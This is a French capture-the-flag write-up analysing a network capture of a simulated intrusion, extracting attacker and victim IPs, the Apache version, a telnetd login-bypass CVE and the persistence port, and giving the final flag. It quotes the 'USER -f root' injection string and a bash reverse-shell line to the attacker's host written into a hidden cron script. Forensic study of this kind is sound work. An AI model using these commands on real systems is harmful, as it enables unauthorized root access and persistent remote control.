404 CTF - Write-Up : Exfiltration Kantik [1/3]
Énoncé du challenge
L'Institut National de Calcul Kantik (INCK) a subi une cyberattaque entraînant la compromission de son serveur et la suppression de données de recherche empiriques. Une capture réseau (network_capture.pcap) couvrant le début de l'intrusion jusqu'à l'exfiltration nous est fournie pour analyser l'attaque.
L'objectif de cette première partie est de cartographier l'intrusion en extrayant les éléments suivants :
- L'adresse IP de l'attaquant.
- L'adresse IP du serveur victime.
- La version exacte du serveur Apache installé sur la victime.
- La CVE exploitée pour obtenir l'accès initial (
root). - Le port d'écoute configuré par l'attaquant pour son reverse shell de persistance.
Étape 1 : Identification des adresses IP (Attaquant & Victime)
L'ouverture du fichier de capture PCAP avec wireshark met en évidence un flux de communication constant entre deux machines du réseau local.
Avec le filtre de recherche "/bin/" qui montre des commande shell sur un serveur web.
En observant les paquets réseau, on identifie :
192.168.122.133: Initie les requêtes suspectes et les commandes distantes. Il s'agit de l'attaquant.192.168.122.177: Reçoit les requêtes et héberge un service Web ainsi qu'un terminal distant. Il s'agit de la victime.
Étape 2 : Identification de la version du serveur Apache
L'énoncé indique la présence d'un serveur Apache sur la machine cible. Pour identifier sa version précise, il suffit d'analyser une réponse HTTP légitime émise par le serveur de la victime.
En appliquant le filtre Wireshark suivant :
http and ip.src == 192.168.122.177
On inspecte les détails d'un paquet de réponse (par exemple un code HTTP/1.1 200 OK). Dans la couche de l'en-tête de l'application (Hypertext Transfer Protocol), la bannière réseau est explicitement révélée :
Server: Apache/2.4.66 (Debian)
La version sémantique exacte à retenir est donc 2.4.66.
Étape 3 : Analyse de l'accès initial et découverte de la CVE
En examinant les trames réseau interactives de début de session, on découvre une tentative d'établissement de terminal, en faisant clique droit et suivi TCPon remarque l'injection spécifique de la chaîne suivante :
USER -f root XTERM-256COLOR
Cette signature technique correspond à l'exploitation d'une vulnérabilité majeure et classique d'injection d'arguments dans le démon telnetd (GNU Inetutils). L'attaquant injecte l'option -f root à l'application /usr/bin/login sous-jacente pour lui ordonner de sauter l'étape d'authentification par mot de passe et d'accorder directement un shell avec les privilèges les plus élevés (uid=0).
Tentative de flag.
En associant l'intégralité des informations recueillies.
J'ai trouvé la vulnérabilité CVE-2026-24061 en cherchant le terme "xterm-256color cve" sur google https://github.com/wesmar/CVE-2026-31431 et le port 23 telnet que j'ai vue dans la capture wireshark
404CTF{192.168.122.177_192.168.122.133_CVE-2026-24061_23}
Mais ça ne marche pas. Continuons nos recherches.
Étape 4 : Extraction du port du Reverse Shell de persistance
Une fois le contrôle du serveur obtenu en tant que root, l'attaquant procède à des actions de reconnaissance (whoami, id, uname -a, cat /etc/passwd).
Il cherche immédiatement à assurer sa persistance sur le système en cas de coupure de la session en cours. Pour cela, il crée un script caché nommé /opt/.system_update et y injecte une commande de reverse shell standard :
echo 'bash -i >& /dev/tcp/192.168.122.133/4444 0>&1' >> /opt/.system_update
Il planifie ensuite l'exécution automatique de ce script toutes les 5 minutes via la configuration d'une tâche Cron (crontab).
La commande indique clairement que la machine de la victime doit initier une connexion réseau sortante vers l'IP de l'attaquant sur le port de destination 4444.
Construction du Flag Final
En associant l'intégralité des informations recueillies selon le format rigide imposé par l'énoncé :
404CTF{IP-Attaquant_IP-Victime_Version-Apache_CVE_Port-Reverse-Shell}
Le flag final validant le défi est :
404CTF{192.168.122.133_192.168.122.177_2.4.66_CVE-2026-24061_4444}